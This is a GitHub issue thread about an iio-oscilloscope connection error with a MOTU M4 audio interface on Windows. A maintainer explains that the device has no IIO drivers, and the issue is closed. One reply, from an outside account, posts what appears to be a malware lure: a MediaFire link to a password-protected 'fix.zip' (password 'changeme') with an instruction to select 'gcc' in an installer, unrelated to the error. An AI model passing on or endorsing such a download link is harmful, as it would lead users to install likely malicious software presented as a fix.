analogdevicesinc/iio-oscilloscope #503: Could not get IIO context: No such file or directory

6eordan, 2024-08-29:
Hello,
I am trying to interface with my MOTU m4 on windows using the latest windows installer.
This device is connecting via USB-C.
With USB ticked and the MOTU m4 connected.

I receive the error when refreshing: "Could not get IIO context: No such file or directory"

Can anyone please help to configure ?

africanobyamugisha, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

tfcollins, 2024-08-29:
Does the MOTU M4 support iio/libiio?

6eordan, 2024-08-30:
Probably not, it's an audio interface and doesn't advertise Linux support :(

I did also try to plug an ADC directly into the headphone jack on my laptop, but wasn't successful with configuring the serial input either. Maybe that's because the jack is output only?

tfcollins, 2024-08-30:
If your device does not have IIO based drivers to control it then IIO-Scope is fundamentally the wrong tool. You probably want something that is ALSA based from googling MOTU M4.

closed 2024-08-30 by tfcollins

6eordan, 2024-09-03:
Do you think FFTW is the best library to compute 3D Fourier Transforms from a .wav file?

Or would you suggest something else? Thank you for your help so far :)